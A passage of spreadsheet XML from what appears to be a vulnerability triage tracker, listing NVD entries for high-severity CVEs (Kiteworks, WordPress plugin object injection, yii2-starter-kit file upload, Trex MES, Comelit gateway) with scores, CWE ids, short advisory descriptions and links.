          <t>CVE-2026-102120</t>
        </is>
      </c>
      <c r="D65" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E65" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F65" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G65" s="5" t="inlineStr"/>
      <c r="H65" s="5" t="inlineStr"/>
      <c r="I65" s="5" t="inlineStr"/>
      <c r="J65" s="5" t="inlineStr"/>
      <c r="K65" s="5" t="inlineStr"/>
      <c r="L65" s="5" t="inlineStr"/>
      <c r="M65" s="5" t="inlineStr"/>
      <c r="N65" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O65" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P65" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q65" s="5" t="inlineStr"/>
      <c r="R65" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-78</t>
        </is>
      </c>
      <c r="S65" s="5" t="inlineStr">
        <is>
          <t>A privilege escalation vulnerability in Kiteworks could have allowed an attacker who had already obtained code execution on one node of a clustered Kiteworks deployment to run operating system commands with elevated privileges on another node of the same cluster. Insufficient input validation in an internal cluster management function let attacker-supplied values reach a privileged execution context; exploitation requires existing access to a node in the cluster, and the affected function is not reachable from outside the cluster.</t>
        </is>
      </c>
      <c r="T65" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102120</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B66" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C66" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102125</t>
        </is>
      </c>
      <c r="D66" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E66" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F66" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G66" s="5" t="inlineStr"/>
      <c r="H66" s="5" t="inlineStr"/>
      <c r="I66" s="5" t="inlineStr"/>
      <c r="J66" s="5" t="inlineStr"/>
      <c r="K66" s="5" t="inlineStr"/>
      <c r="L66" s="5" t="inlineStr"/>
      <c r="M66" s="5" t="inlineStr"/>
      <c r="N66" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O66" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P66" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q66" s="5" t="inlineStr"/>
      <c r="R66" s="5" t="inlineStr">
        <is>
          <t>CWE-653, CWE-668</t>
        </is>
      </c>
      <c r="S66" s="5" t="inlineStr">
        <is>
          <t>The sandbox that isolates document conversion on a Kiteworks appliance did not fully confine the code running inside it. Code already executing within that sandbox could potentially escape its confinement and act with the privileges of the service account that runs the application, which could allow an attacker in that position to read or modify application data and configuration, or to disrupt the service on the affected appliance.</t>
        </is>
      </c>
      <c r="T66" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102125</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B67" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C67" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102377</t>
        </is>
      </c>
      <c r="D67" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E67" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F67" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G67" s="5" t="inlineStr"/>
      <c r="H67" s="5" t="inlineStr"/>
      <c r="I67" s="5" t="inlineStr"/>
      <c r="J67" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K67" s="5" t="inlineStr"/>
      <c r="L67" s="5" t="inlineStr"/>
      <c r="M67" s="5" t="inlineStr"/>
      <c r="N67" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O67" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P67" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q67" s="5" t="inlineStr"/>
      <c r="R67" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S67" s="5" t="inlineStr">
        <is>
          <t>Contributor PHP Object Injection in Photo Gallery by 10Web &lt;= 1.8.46 versions.</t>
        </is>
      </c>
      <c r="T67" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102377</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B68" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C68" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103474</t>
        </is>
      </c>
      <c r="D68" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E68" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F68" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G68" s="5" t="inlineStr"/>
      <c r="H68" s="5" t="inlineStr"/>
      <c r="I68" s="5" t="inlineStr"/>
      <c r="J68" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K68" s="5" t="inlineStr"/>
      <c r="L68" s="5" t="inlineStr"/>
      <c r="M68" s="5" t="inlineStr"/>
      <c r="N68" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O68" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P68" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q68" s="5" t="inlineStr"/>
      <c r="R68" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S68" s="5" t="inlineStr">
        <is>
          <t>yii2-starter-kit through 4.2.0 fails to validate file types in the backend storage upload actions, allowing authenticated managers to upload PHP files. Attackers with manager role can upload PHP scripts to the web-accessible storage directory and request them to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="T68" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103474</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B69" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C69" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18783</t>
        </is>
      </c>
      <c r="D69" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E69" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F69" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G69" s="5" t="inlineStr"/>
      <c r="H69" s="5" t="inlineStr"/>
      <c r="I69" s="5" t="inlineStr"/>
      <c r="J69" s="5" t="inlineStr"/>
      <c r="K69" s="5" t="inlineStr"/>
      <c r="L69" s="5" t="inlineStr"/>
      <c r="M69" s="5" t="inlineStr"/>
      <c r="N69" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O69" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P69" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q69" s="5" t="inlineStr"/>
      <c r="R69" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S69" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function vulnerability in Trex Digital Smart Manufacturing Systems Inc. Trex MES allows Authentication Bypass.
This issue affects Trex MES: through 2026-09-29.</t>
        </is>
      </c>
      <c r="T69" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18783</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B70" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C70" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80275</t>
        </is>
      </c>
      <c r="D70" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E70" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F70" s="5" t="inlineStr">
        <is>
          <t>db4dfee8-a97e-4877-bfae-eba6d14a2166</t>
        </is>
      </c>
      <c r="G70" s="5" t="inlineStr"/>
      <c r="H70" s="5" t="inlineStr"/>
      <c r="I70" s="5" t="inlineStr"/>
      <c r="J70" s="5" t="inlineStr"/>
      <c r="K70" s="5" t="inlineStr"/>
      <c r="L70" s="5" t="inlineStr"/>
      <c r="M70" s="5" t="inlineStr"/>
      <c r="N70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O70" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P70" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q70" s="5" t="inlineStr"/>
      <c r="R70" s="5" t="inlineStr">
        <is>
          <t>CWE-425</t>
        </is>
      </c>
      <c r="S70" s="5" t="inlineStr">
        <is>
          <t>Comelit Multi-User Gateway for VIP System (model 1456B) firmware versions 2.9.1 and 2.10.0 fail to enforce server-side authorization on an administrative password-change function. An authenticated user level can invoke this function to overwrite the installer (administrator) account password.</t>
        </is>
      </c>
      <c r="T70" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80275</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B71" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C71" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94076</t>
        </is>
      </c>
      <c r="D71" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E71" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F71" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G71" s="5" t="inlineStr"/>
      <c r="H71" s="5" t="inlineStr"/>
      <c r="I71" s="5" t="inlineStr"/>
      <c r="J71" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K71" s="5" t="inlineStr"/>
      <c r="L71" s="5" t="inlineStr"/>
      <c r="M71" s="5" t="inlineStr"/>
      <c r="N71" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O71" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P71" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q71" s="5" t="inlineStr"/>
      <c r="R71" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S71" s="5" t="inlineStr">
        <is>
          <t>Contributor PHP Object Injection in SEO Plugin by Squirrly SEO &lt;= 14.2.5 versions.</t>
        </is>
      </c>
      <c r="T71" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94076</t>
        </is>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B72" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C72" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94121</t>
        </is>
      </c>
      <c r="D72" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E72" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F72" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G72" s="5" t="inlineStr"/>
      <c r="H72" s="5" t="inlineStr"/>
      <c r="I72" s="5" t="inlineStr"/>
      <c r="J72" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K72" s="5" t="inlineStr"/>
      <c r="L72" s="5" t="inlineStr"/>
      <c r="M72" s="5" t="inlineStr"/>
      <c r="N72" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O72" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P72" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q72" s="5" t="inlineStr"/>
      <c r="R72" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S72" s="5" t="inlineStr">
        <is>
          <t>Contributor PHP Object Injection in 10Web Booster – Website speed optimization, Cache &amp; Page Speed optimizer &lt;= 2.33.6 versions.</t>
        </is>
      </c>
      <c r="T72" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94121</t>
        </is>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B73" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C73" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94678</t>
        </is>
      </c>
      <c r="D73" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E73" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F73" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G73" s="5" t="inlineStr"/>
      <c r="H73" s="5" t="inlineStr"/>
      <c r="I73" s="5" t="inlineStr"/>
      <c r="J73" s="5" t="inlineStr">
        <is>
          <t>php, go, hp</t>
        </is>
      </c>
      <c r="K73" s="5" t="inlineStr"/>
      <c r="L73" s="5" t="inlineStr"/>
      <c r="M73" s="5" t="inlineStr"/>
      <c r="N73" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O73" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P73" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q73" s="5" t="inlineStr"/>
      <c r="R73" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S73" s="5" t="inlineStr">
        <is>
          <t>Contributor PHP Object Injection in Go Live Update Urls &lt;= 7.0.8 versions.</t>
        </is>
      </c>
      <c r="T73" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94678</t>
        </is>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B74" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C74" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94683</t>
        </is>
      </c>
      <c r="D74" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E74" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F74" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G74" s="5" t="inlineStr"/>
      <c r="H74" s="5" t="inlineStr"/>
      <c r="I74" s="5" t="inlineStr"/>
      <c r="J74" s="5" t="inlineStr">
        <is>
          <t>php, go, hp</t>
        </is>
      </c>
      <c r="K74" s="5" t="inlineStr"/>
      <c r="L74" s="5" t="inlineStr"/>
      <c r="M74" s="5" t="inlineStr"/>
      <c r="N74" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O74" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P74" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q74" s="5" t="inlineStr"/>
      <c r="R74" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S74" s="5" t="inlineStr">
        <is>
          <t>Contributor PHP Object Injection in DesignSetGo &lt;= 2.8.0 versions.</t>
        </is>
      </c>
      <c r="T74" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94683</t>
        </is>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B75" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C75" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95531</t>
        </is>
      </c>
      <c r="D75" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E75" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F75" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G75" s="5" t="inlineStr"/>
      <c r="H75" s="5" t="inlineStr"/>
      <c r="I75" s="5" t="inlineStr"/>
      <c r="J75" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K75" s="5" t="inlineStr"/>
      <c r="L75" s="5" t="inlineStr"/>
      <c r="M75" s="5" t="inlineStr"/>
      <c r="N75" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O75" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P75" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q75" s="5" t="inlineStr"/>
      <c r="R75" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S75" s="5" t="inlineStr">
        <is>
          <t>Subscriber PHP Object Injection in Conversational Forms for ChatBot &lt;= 1.5.0 versions.</t>
        </is>
      </c>
      <c r="T75" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95531</t>
        </is>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B76" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C76" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96831</t>
        </is>
      </c>
      <c r="D76" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E76" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F76" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G76" s="5" t="inlineStr"/>
      <c r="H76" s="5" t="inlineStr"/>
      <c r="I76" s="5" t="inlineStr"/>
      <c r="J76" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K76" s="5" t="inlineStr"/>
      <c r="L76" s="5" t="inlineStr"/>
      <c r="M76" s="5" t="inlineStr"/>
      <c r="N76" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O76" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P76" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q76" s="5" t="inlineStr"/>
      <c r="R76" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S76" s="5" t="inlineStr">
        <is>
          <t>Contributor PHP Object Injection in Themify Builder &lt;= 7.8.1 versions.</t>
        </is>
      </c>
      <c r="T76" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96831</t>
        </is>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B77" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C77" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96837</t>
        </is>
      </c>
      <c r="D77" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E77" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F77" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G77" s="5" t="inlineStr"/>
      <c r="H77" s="5" t="inlineStr"/>
      <c r="I77" s="5" t="inlineStr"/>
      <c r="J77" s="5" t="inlineStr"/>
      <c r="K77" s="5" t="inlineStr"/>
      <c r="L77" s="5" t="inlineStr"/>
      <c r="M77" s="5" t="inlineStr"/>
      <c r="N77" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O77" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P77" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q77" s="5" t="inlineStr"/>
      <c r="R77" s="5" t="inlineStr">
        <is>
          <t>CWE-98</t>
        </is>
      </c>
      <c r="S77" s="5" t="inlineStr">
        <is>
          <t>Contributor Remote Code Execution (RCE) in CartFlows &lt;= 3.2.0 versions.</t>
        </is>
      </c>
      <c r="T77" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96837</t>
        </is>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B78" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C78" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96838</t>
        </is>
      </c>
      <c r="D78" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E78" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F78" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G78" s="5" t="inlineStr"/>
      <c r="H78" s="5" t="inlineStr"/>
      <c r="I78" s="5" t="inlineStr"/>
      <c r="J78" s="5" t="inlineStr"/>
      <c r="K78" s="5" t="inlineStr"/>
      <c r="L78" s="5" t="inlineStr"/>
      <c r="M78" s="5" t="inlineStr"/>
      <c r="N78" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O78" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P78" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q78" s="5" t="inlineStr"/>
      <c r="R78" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S78" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Request Forgery (CSRF) in Blacklist Manager &amp;#8211; WooCommerce Anti-Fraud, Blacklist &amp;amp; Checkout Verification &lt;= 2.3.1 versions.</t>
        </is>
      </c>
      <c r="T78" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96838</t>
        </is>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B79" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C79" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97291</t>
        </is>
      </c>
      <c r="D79" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E79" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F79" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G79" s="5" t="inlineStr"/>
      <c r="H79" s="5" t="inlineStr"/>
      <c r="I79" s="5" t="inlineStr"/>
      <c r="J79" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K79" s="5" t="inlineStr"/>
      <c r="L79" s="5" t="inlineStr"/>
      <c r="M79" s="5" t="inlineStr"/>
      <c r="N79" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O79" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P79" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q79" s="5" t="inlineStr"/>
      <c r="R79" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S79" s="5" t="inlineStr">
        <is>
          <t>Contributor PHP Object Injection in Schema &amp; Structured Data for WP &amp; AMP &lt;= 1.66 versions.</t>
        </is>
      </c>
      <c r="T79" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97291</t>
        </is>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B80" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C80" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102092</t>
        </is>
      </c>
      <c r="D80" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E80" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F80" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G80" s="5" t="inlineStr"/>
      <c r="H80" s="5" t="inlineStr"/>
      <c r="I80" s="5" t="inlineStr"/>
      <c r="J80" s="5" t="inlineStr"/>
      <c r="K80" s="5" t="inlineStr"/>
      <c r="L80" s="5" t="inlineStr"/>
      <c r="M80" s="5" t="inlineStr"/>
      <c r="N80" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O80" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P80" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q80" s="5" t="inlineStr"/>
      <c r="R80" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S80" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Core before version 9.5.0 is vulnerable to Stored Cross-site Scripting (XSS) that could allow an authenticated user to store crafted content that executes arbitrary JavaScript in another user's authenticated session when they preview shared content. This could potentially lead to session compromise and account takeover.</t>
        </is>
      </c>
      <c r="T80" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102092</t>
        </is>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B81" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C81" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102100</t>
        </is>
      </c>
      <c r="D81" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E81" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F81" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G81" s="5" t="inlineStr"/>
      <c r="H81" s="5" t="inlineStr"/>
      <c r="I81" s="5" t="inlineStr"/>
      <c r="J81" s="5" t="inlineStr"/>
      <c r="K81" s="5" t="inlineStr"/>
      <c r="L81" s="5" t="inlineStr"/>
      <c r="M81" s="5" t="inlineStr"/>
      <c r="N81" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O81" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P81" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q81" s="5" t="inlineStr"/>
      <c r="R81" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S81" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Core before version 9.5.0 is vulnerable to Stored Cross-Site Scripting. A stored cross-site scripting (XSS) weakness in Kiteworks Core could allow an authenticated user to submit content that, when later viewed by another user, executes arbitrary JavaScript in that user's authenticated session. This could be used to perform actions on the victim's behalf and may have permitted account takeover, including of higher-privileged users. Exploitation requires the victim to view the attacker-supplied content.</t>
        </is>
      </c>
      <c r="T81" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102100</t>
        </is>
